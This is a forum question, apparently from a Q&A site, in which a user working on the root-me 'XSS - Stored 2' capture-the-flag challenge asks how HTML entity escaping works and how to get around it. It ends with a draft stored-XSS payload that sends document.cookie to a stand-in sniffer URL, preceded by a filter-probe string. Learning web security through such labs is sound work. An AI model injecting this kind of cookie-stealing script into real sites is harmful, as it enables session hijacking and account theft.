Question for fans of CTF(XSS)?

H

HexUserHex2020-04-30 12:47:32

JavaScript

HexUserHex, 2020-04-30 12:47:32

Good afternoon,
I'm slowly going through CTF (XSS - Stored 2) on root-me, in general, the task, as always, is to steal the admin cookies, because at the time when this challenge was created, there was no 'http only' flag yet. So I found an input that seems to skip all the characters, which I immediately checked by feeding it to it:
'';!--"<fuck>=&{()}

Then I tried it, insert the usual alert () I press F12 and go to look where exactly (between which tags) it was put by the backend ...
<script>alert(1)</alert>

<html><head>
  <title>Forum v0.002</title>
  <style>
      .invite { color: green; }
      .admin { color: red;}
  </style>
    </head>
   <body><link rel="stylesheet" property="stylesheet" id="s" type="text/css" href="/template/s.css" media="all"><iframe id="iframe" src="https://www.root-me.org/?page=externe_header"></iframe>
        <h1>Forum v0.002</h1>
  <hr>
  
  <div>
      <span><a href="./?section=admin">admin</a></span>
      <span style="text-align: right; float:right;">Statut / Status : <i class="invite">invite</i></span>
  </div><br>



  <b>message enregistré / content saved</b><br><br>        <form action="" method="POST">
          <div>
              Titre / Title&nbsp;:<br>
              <input name="titre" value="" type="text">
          </div><br>
          <div>
              Message / Content&nbsp;:<br>
              <textarea name="message" rows="3" cols="50"></textarea>
          </div>
          <div>
              <input value="envoyer / send" type="submit">
          </div>
        </form><br><br>
        <div>
          <div>Posted messages:</div><br>
    <span><b>Welcome</b></span><br>
    <span>N'hésitez pas à me laisser un message / Don't hesitate, let a message</span><br><hr>
    <span><b>test_filter</b>&nbsp;(<i class="invite">status : invite</i>)</span><br><span>'';!--"&lt;fuck&gt;=&amp;{()} </span><br><hr>
        </div>
    

</body></html>

And I find my js code at the end:
<script>alert(1)</alert>

1. Attention, the most important question, as far as I understand, the browser replaced the special characters found in my request with special codes (I will be glad if you tell me their name) which, by definition, will NEVER be processed as HTML, but will be successfully rendered by the browser?

2. If so, what should my so-called payload be translated into so that the backend 'skips' all the characters and that they are processed as html / js code?

3. Another question (I'm not sure that I'll ask it correctly): in what view do browsers process these data? That is, I can encode the usual html / js code in ascii or utf8 or in a URL or in HEX in general .. and the browser will automatically interpret and show my html without any problems?

As soon as I solve this problem, as far as I understand, it will be necessary to close all external tags, so to speak, and then just insert my js payload, at the moment I came to this option:

</span></br></div><script>document.location.href = 'https://mysniffer?cookies =' + document.cookie;</script><div><span>

ps: I know that you can always look at writeup, but I'm interested in understanding it :)